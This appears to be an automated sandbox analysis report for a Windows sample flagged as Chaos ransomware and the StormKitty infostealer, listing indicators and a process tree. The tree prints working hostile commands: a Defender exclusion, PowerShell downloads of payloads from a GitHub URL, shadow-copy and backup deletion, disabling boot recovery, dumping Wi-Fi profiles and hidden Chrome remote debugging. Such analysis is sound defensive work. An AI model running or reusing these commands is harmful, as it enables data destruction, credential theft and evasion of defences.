Analysis
-
max time kernel
25s -
max time network
25s -
platform
windows11-21h2_x64 -
resource
win11-20250314-en -
resource tags
arch:x64arch:x86image:win11-20250314-enlocale:en-usos:windows11-21h2-x64system -
submitted
22/03/2025, 02:31
Behavioral task
behavioral1
Sample
nig.exe
Resource
win11-20250314-en
General
-
Target
nig.exe
-
Size
56KB
-
MD5
827c7f426f6d6770d127ee96a29ad6db
-
SHA1
0ed96a36e037baef30f459cc54a50db51ca0e9d9
-
SHA256
90e7162a771d6d4ad5e46f38611fec16d2dee5583d628ef7bf205e727e6ebff4
-
SHA512
c2cba465541b8f5ecd7e8fd48bcbf7a02c97279b7c7edb10601d8d7646b28bb30059470248164a13122fd65de2a8318d4f337739dac326ea871d870bd1d8b782
-
SSDEEP
1536:U4dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNHmn5aHc:U4dzVTaer344JzthRZijQ1J6
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 2 IoCs
resource yara_rule behavioral1/files/0x001b00000002b23e-42.dat family_chaos behavioral1/memory/3368-46-0x00000000003F0000-0x0000000000418000-memory.dmp family_chaos -
Chaos family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x001c00000002b247-45.dat family_stormkitty behavioral1/memory/1040-57-0x00000000008C0000-0x00000000008FC000-memory.dmp family_stormkitty -
Stormkitty family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1284 bcdedit.exe 1496 bcdedit.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 2 548 powershell.exe 3 548 powershell.exe 5 3336 powershell.exe 6 3336 powershell.exe -
pid Process 3828 wbadmin.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file 2 IoCs
flow pid Process 3 548 powershell.exe 6 3336 powershell.exe -
Uses browser remote debugging 2 TTPs 5 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4788 chrome.exe 1132 chrome.exe 1236 chrome.exe 3436 chrome.exe 3984 chrome.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe -
Executes dropped EXE 3 IoCs
pid Process 3368 build.exe 1040 kernelv.exe 5196 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe Key opened \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe Key opened \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
pid Process 3336 powershell.exe 548 powershell.exe 3468 powershell.exe -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini svchost.exe File opened for modification C:\Users\Public\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Public\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Public\desktop.ini svchost.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1678082226-3994841222-899489560-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini svchost.exe File opened for modification C:\Users\Public\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ipinfo.io 7 ipinfo.io -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4clkgsoto.jpg" svchost.exe -
resource yara_rule behavioral1/memory/2376-0-0x0000000140000000-0x0000000140027000-memory.dmp upx behavioral1/memory/2376-61-0x0000000140000000-0x0000000140027000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 3468 powershell.exe 3896 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kernelv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3720 cmd.exe 2720 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 kernelv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier kernelv.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1916 vssadmin.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings svchost.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1284 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5196 svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3468 powershell.exe 3468 powershell.exe 548 powershell.exe 548 powershell.exe 3336 powershell.exe 3336 powershell.exe 3368 build.exe 3896 powershell.exe 3368 build.exe 3368 build.exe 3896 powershell.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 3368 build.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 1040 kernelv.exe 5196 svchost.exe 5196 svchost.exe 5196 svchost.exe 5196 svchost.exe 5196 svchost.exe 5196 svchost.exe 5196 svchost.exe 5196 svchost.exe 5196 svchost.exe 5196 svchost.exe 5196 svchost.exe 5196 svchost.exe 5196 svchost.exe 5196 svchost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 4788 chrome.exe 4788 chrome.exe 4788 chrome.exe 4788 chrome.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 3468 powershell.exe Token: SeDebugPrivilege 548 powershell.exe Token: SeDebugPrivilege 3336 powershell.exe Token: SeDebugPrivilege 3368 build.exe Token: SeDebugPrivilege 3896 powershell.exe Token: SeDebugPrivilege 1040 kernelv.exe Token: SeDebugPrivilege 5196 svchost.exe Token: SeShutdownPrivilege 4788 chrome.exe Token: SeCreatePagefilePrivilege 4788 chrome.exe Token: SeShutdownPrivilege 4788 chrome.exe Token: SeCreatePagefilePrivilege 4788 chrome.exe Token: SeShutdownPrivilege 4788 chrome.exe Token: SeCreatePagefilePrivilege 4788 chrome.exe Token: SeBackupPrivilege 4824 vssvc.exe Token: SeRestorePrivilege 4824 vssvc.exe Token: SeAuditPrivilege 4824 vssvc.exe Token: SeIncreaseQuotaPrivilege 2416 WMIC.exe Token: SeSecurityPrivilege 2416 WMIC.exe Token: SeTakeOwnershipPrivilege 2416 WMIC.exe Token: SeLoadDriverPrivilege 2416 WMIC.exe Token: SeSystemProfilePrivilege 2416 WMIC.exe Token: SeSystemtimePrivilege 2416 WMIC.exe Token: SeProfSingleProcessPrivilege 2416 WMIC.exe Token: SeIncBasePriorityPrivilege 2416 WMIC.exe Token: SeCreatePagefilePrivilege 2416 WMIC.exe Token: SeBackupPrivilege 2416 WMIC.exe Token: SeRestorePrivilege 2416 WMIC.exe Token: SeShutdownPrivilege 2416 WMIC.exe Token: SeDebugPrivilege 2416 WMIC.exe Token: SeSystemEnvironmentPrivilege 2416 WMIC.exe Token: SeRemoteShutdownPrivilege 2416 WMIC.exe Token: SeUndockPrivilege 2416 WMIC.exe Token: SeManageVolumePrivilege 2416 WMIC.exe Token: 33 2416 WMIC.exe Token: 34 2416 WMIC.exe Token: 35 2416 WMIC.exe Token: 36 2416 WMIC.exe Token: SeIncreaseQuotaPrivilege 2416 WMIC.exe Token: SeSecurityPrivilege 2416 WMIC.exe Token: SeTakeOwnershipPrivilege 2416 WMIC.exe Token: SeLoadDriverPrivilege 2416 WMIC.exe Token: SeSystemProfilePrivilege 2416 WMIC.exe Token: SeSystemtimePrivilege 2416 WMIC.exe Token: SeProfSingleProcessPrivilege 2416 WMIC.exe Token: SeIncBasePriorityPrivilege 2416 WMIC.exe Token: SeCreatePagefilePrivilege 2416 WMIC.exe Token: SeBackupPrivilege 2416 WMIC.exe Token: SeRestorePrivilege 2416 WMIC.exe Token: SeShutdownPrivilege 2416 WMIC.exe Token: SeDebugPrivilege 2416 WMIC.exe Token: SeSystemEnvironmentPrivilege 2416 WMIC.exe Token: SeRemoteShutdownPrivilege 2416 WMIC.exe Token: SeUndockPrivilege 2416 WMIC.exe Token: SeManageVolumePrivilege 2416 WMIC.exe Token: 33 2416 WMIC.exe Token: 34 2416 WMIC.exe Token: 35 2416 WMIC.exe Token: 36 2416 WMIC.exe Token: SeShutdownPrivilege 4788 chrome.exe Token: SeCreatePagefilePrivilege 4788 chrome.exe Token: SeBackupPrivilege 5004 wbengine.exe Token: SeRestorePrivilege 5004 wbengine.exe Token: SeSecurityPrivilege 5004 wbengine.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4788 chrome.exe 4788 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2376 wrote to memory of 5904 2376 nig.exe 78 PID 2376 wrote to memory of 5904 2376 nig.exe 78 PID 5904 wrote to memory of 568 5904 cmd.exe 80 PID 5904 wrote to memory of 568 5904 cmd.exe 80 PID 568 wrote to memory of 1448 568 net.exe 81 PID 568 wrote to memory of 1448 568 net.exe 81 PID 5904 wrote to memory of 3468 5904 cmd.exe 82 PID 5904 wrote to memory of 3468 5904 cmd.exe 82 PID 5904 wrote to memory of 548 5904 cmd.exe 83 PID 5904 wrote to memory of 548 5904 cmd.exe 83 PID 5904 wrote to memory of 3336 5904 cmd.exe 84 PID 5904 wrote to memory of 3336 5904 cmd.exe 84 PID 5904 wrote to memory of 3368 5904 cmd.exe 85 PID 5904 wrote to memory of 3368 5904 cmd.exe 85 PID 5904 wrote to memory of 1040 5904 cmd.exe 86 PID 5904 wrote to memory of 1040 5904 cmd.exe 86 PID 5904 wrote to memory of 1040 5904 cmd.exe 86 PID 5904 wrote to memory of 3896 5904 cmd.exe 87 PID 5904 wrote to memory of 3896 5904 cmd.exe 87 PID 1040 wrote to memory of 3720 1040 kernelv.exe 88 PID 1040 wrote to memory of 3720 1040 kernelv.exe 88 PID 1040 wrote to memory of 3720 1040 kernelv.exe 88 PID 3720 wrote to memory of 5100 3720 cmd.exe 90 PID 3720 wrote to memory of 5100 3720 cmd.exe 90 PID 3720 wrote to memory of 5100 3720 cmd.exe 90 PID 3720 wrote to memory of 2720 3720 cmd.exe 92 PID 3720 wrote to memory of 2720 3720 cmd.exe 92 PID 3720 wrote to memory of 2720 3720 cmd.exe 92 PID 3720 wrote to memory of 4972 3720 cmd.exe 93 PID 3720 wrote to memory of 4972 3720 cmd.exe 93 PID 3720 wrote to memory of 4972 3720 cmd.exe 93 PID 1040 wrote to memory of 5452 1040 kernelv.exe 94 PID 1040 wrote to memory of 5452 1040 kernelv.exe 94 PID 1040 wrote to memory of 5452 1040 kernelv.exe 94 PID 5452 wrote to memory of 5668 5452 cmd.exe 96 PID 5452 wrote to memory of 5668 5452 cmd.exe 96 PID 5452 wrote to memory of 5668 5452 cmd.exe 96 PID 5452 wrote to memory of 1324 5452 cmd.exe 97 PID 5452 wrote to memory of 1324 5452 cmd.exe 97 PID 5452 wrote to memory of 1324 5452 cmd.exe 97 PID 3368 wrote to memory of 5196 3368 build.exe 98 PID 3368 wrote to memory of 5196 3368 build.exe 98 PID 1040 wrote to memory of 4788 1040 kernelv.exe 99 PID 1040 wrote to memory of 4788 1040 kernelv.exe 99 PID 4788 wrote to memory of 752 4788 chrome.exe 100 PID 4788 wrote to memory of 752 4788 chrome.exe 100 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 6000 4788 chrome.exe 102 PID 4788 wrote to memory of 6000 4788 chrome.exe 102 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 PID 4788 wrote to memory of 4296 4788 chrome.exe 101 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\nig.exe"C:\Users\Admin\AppData\Local\Temp\nig.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4FA6.tmp\4FA7.tmp\4FA8.bat C:\Users\Admin\AppData\Local\Temp\nig.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:5904 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:1448
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5196 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete5⤵PID:4060
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:1916
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no5⤵PID:5272
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵
- Modifies boot configuration data using bcdedit
PID:1284
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no6⤵
- Modifies boot configuration data using bcdedit
PID:1496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet5⤵PID:5640
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet6⤵
- Deletes backup catalog
PID:3828
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt5⤵
- Opens file in notepad (likely ransom note)
PID:1284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kernelv.exe"C:\Users\Admin\AppData\Local\Temp\kernelv.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1040 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:5100
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2720
-
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵
- System Location Discovery: System Language Discovery
PID:4972
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5452 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:5668
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1324
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
